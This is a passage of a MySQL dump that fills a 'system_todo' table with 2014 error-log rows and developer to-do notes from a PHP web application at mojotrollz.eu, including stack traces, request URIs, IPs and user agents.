\'api_mojotrollz\', Array)\n#2 {main}', '93.204.81.49', 0.012, '2014-12-02 14:58:38', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1417528713379', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (414, 'ERROR', 'You need to be logged in to view this ressource.', 'ce1bcbc4e2e244f775aa9a8fc9de471d0b058843', 1, '/home/web/webdir/mojotrollz/mojotrollz/page/page_mojotrollz.php', 59, '#0 [internal function]: page_mojotrollz::page_user_nexus_menu_sub(\'2\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/index.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'page_mojotrollz\', Array, 1, false, true)\n#3 {main}', '93.204.81.49', 0.024, '2014-12-02 16:03:20', 'mojotrollz.eu', 80, '/web/mojotrollz/?page=user_nexus_menu_sub&menu=2&', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 5, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (415, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1417529564160', '0daab7f2e2905606716ddcb943e69d62da1220aa', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '93.204.81.49', 0.004, '2014-12-02 15:18:30', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1417529564160', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (707, 'Exception', 'Skilltrees Liste umkehren', 'f2b1743e40932fb0ec35b1341143a471c1bf1c45', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Skilltrees List...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:57:21', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Skilltrees%20Liste%20umkehren', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=11_0000000000000000_5002401323202151_000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (416, 'SYSTEM\\LOG\\ERROR', 'Class not found: user_nexus_menu', '35e5ea65b66759b9608885140246b20aec9205fd', 1, '/home/mojotrolls/mojo_zero/src/web/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'user_nexus_menu\')\n#1 [internal function]: spl_autoload_call(\'user_nexus_menu\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/page/State.php(11): class_exists(\'user_nexus_menu\')\n#3 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(16): SYSTEM\\PAGE\\State::get(\'2\')\n#4 [internal function]: SYSTEM\\API\\api_system::call_pages(\'2\')\n#5 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#6 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#7 {main}', '37.201.182.212', 0.08, '2014-12-04 18:04:38', 'www.mojotrollz.eu', 80, '/api.php?call=pages&group=2', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (419, 'SYSTEM\\LOG\\ERROR', 'API call is not implemented in API: sai_mod_saimod_mojotrollz_db_tags', '4906c2a781061c7e6384ad4e9aabe8f91a41a747', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 101, '#0 /home/web/webdir/mojotrollz/system/api/api.php(56): SYSTEM\\API\\api::do_default(false, \'saimod_mojotrol...\', \'sai_mod_saimod_...\')\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.240', 0.06, '2014-12-11 00:17:00', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_tags', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 6, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (420, 'SYSTEM\\LOG\\ERROR', 'Class not found: SYSTEM\\SAI\\replace', '01f6d4a6a7f14d29084611550844c8561cf3e0e6', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'SYSTEM\\\\SAI\\\\repl...\')\n#1 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_tags/saimod_mojotrollz_db_tags.php(5): spl_autoload_call(\'SYSTEM\\\\SAI\\\\repl...\')\n#2 [internal function]: saimod_mojotrollz_db_tags::sai_mod_saimod_mojotrollz_db_tags()\n#3 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#4 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#5 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#6 {main}', '37.24.148.240', 0.016, '2014-12-10 23:47:09', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_tags', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (422, 'SYSTEM\\LOG\\ERROR', 'Parameter type missmacht or Missing Verifier. Param: table Verifier: INT', '9fc97db54c8a0956090eaebbc8d120b11cf0d725', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 156, '#0 /home/web/webdir/mojotrollz/system/api/api.php(38): SYSTEM\\API\\api::do_parameters(Array, Array, 1300, \'list\', \'\\\\SYSTEM\\\\API\\\\ver...\')\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.242', 0.016, '2014-12-11 00:17:50', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_tags&action=list&table=creatures', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (423, 'SYSTEM\\LOG\\ERROR', 'Prepared Statement prepare fail: Query was empty', 'e968e66061c535723cc197408096fac4197b6a53', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 27, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(35): SYSTEM\\DB\\ConnectionMYS->prepare(\'DBD\\\\DB_TAGS_TYP...\', NULL, Array)\n#1 /home/web/webdir/mojotrollz/system/db/qq/QP.php(14): SYSTEM\\DB\\Connection->prepare(\'DBD\\\\DB_TAGS_TYP...\', NULL, Array)\n#2 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_tags/saimod_mojotrollz_db_tags.php(6): SYSTEM\\DB\\QP::QQ(Array)\n#3 [internal function]: saimod_mojotrollz_db_tags::sai_mod_saimod_mojotrollz_db_tags_action_list(\'1\')\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#6 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#7 {main}', '37.24.148.242', 0.076, '2014-12-23 14:49:39', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_tags&action=list&table=1', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 11, b'0', 0, 10, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (424, 'SYSTEM\\LOG\\ERROR', 'Prepared Statement prepare fail: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'table = ?\' at line 1', 'e1e26bb4d58914946641557a5a321a91e86be620', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 27, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(35): SYSTEM\\DB\\ConnectionMYS->prepare(\'DBD\\\\DB_TAGS_TYP...\', \'SELECT * FROM m...\', Array)\n#1 /home/web/webdir/mojotrollz/system/db/qq/QP.php(14): SYSTEM\\DB\\Connection->prepare(\'DBD\\\\DB_TAGS_TYP...\', \'SELECT * FROM m...\', Array)\n#2 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_tags/saimod_mojotrollz_db_tags.php(6): SYSTEM\\DB\\QP::QQ(Array)\n#3 [internal function]: saimod_mojotrollz_db_tags::sai_mod_saimod_mojotrollz_db_tags_action_list(\'1\')\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#6 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#7 {main}', '37.24.148.242', 0.02, '2014-12-21 20:38:18', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_tags&action=list&table=1', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 11, b'0', 0, 3, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (425, 'Exception', 'tag module', '387ff64871d012de65f46f75bab3f89148e71e22', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'tag module\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.016, '2014-12-11 01:33:09', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=tag%20module', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 11, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (426, 'Exception', 'tag system', '4efad7164935f3566a7757f3bbd53c0e1cc8dfa3', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'tag system\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.016, '2014-12-11 01:33:17', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=tag%20system', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 11, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (427, 'SYSTEM\\LOG\\ERROR', 'Folder not found on registerFolder for Autoload: /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_command', 'f331cb69c7b3b8f720bce7f361b514a7cb169dbb', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 52, '#0 /home/web/webdir/mojotrollz/mojotrollz/sai/autoload.inc.php(4): SYSTEM\\autoload::registerFolder(\'/home/web/webdi...\', \'\')\n#1 /home/web/webdir/mojotrollz/sai.php(13): require_once(\'/home/web/webdi...\')\n#2 {main}', '37.24.148.242', 0, '2014-12-11 01:43:59', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saistart_sys_sai', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 11, b'0', 0, 3, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (428, 'SYSTEM\\LOG\\ERROR', 'API call is not implemented in API: sai_mod_saimod_mojotrollz_db_quest_flag_css', 'e235e8de92132bd1488a01a601481317b33d3314', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 101, '#0 /home/web/webdir/mojotrollz/system/api/api.php(56): SYSTEM\\API\\api::do_default(false, \'saimod_mojotrol...\', \'sai_mod_saimod_...\')\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.242', 0.016, '2014-12-11 02:01:27', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_quest&css=1', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 11, b'0', 0, 7, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (429, 'SYSTEM\\LOG\\ERROR', 'API call is not implemented in API: sai_mod_saimod_mojotrollz_db_quest_flag_js', '1a4d191fc6bd12ba4d679f162ad776b4b11cf0fc', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 101, '#0 /home/web/webdir/mojotrollz/system/api/api.php(56): SYSTEM\\API\\api::do_default(false, \'saimod_mojotrol...\', \'sai_mod_saimod_...\')\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.242', 0.028, '2014-12-11 02:01:27', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_quest&js=1', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 11, b'0', 0, 7, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (431, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418295531136', '52c743579193d71a443170fef5a4b86cb8d52508', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '80.140.228.252', 0.004, '2014-12-11 12:11:22', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418295531136', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (432, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418295531144', '7550f40cb6ac656ea885ce117d9f76fd4fbdade0', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '80.140.228.252', 0.008, '2014-12-11 12:11:22', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418295531144', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (433, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418295531152', '620b20547b46292de5003514a27ccd6ef7227154', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '80.140.228.252', 0.016, '2014-12-11 12:11:22', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418295531152', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (434, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418296282478', '89d020d74aa758308b05454c1f11b5fd3bd5edd5', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '80.140.228.252', 0.024, '2014-12-11 12:11:25', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418296282478', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (435, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418296282486', 'ec7b1e55d60c1b57b0fbd1d66a504f6b5d7bb051', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '80.140.228.252', 0.004, '2014-12-11 12:11:26', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418296282486', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (436, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418296293455', '1d7434fc4d91245dd35b96a571502c44638359b8', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '80.140.228.252', 0.004, '2014-12-11 12:20:15', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418296293455', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, 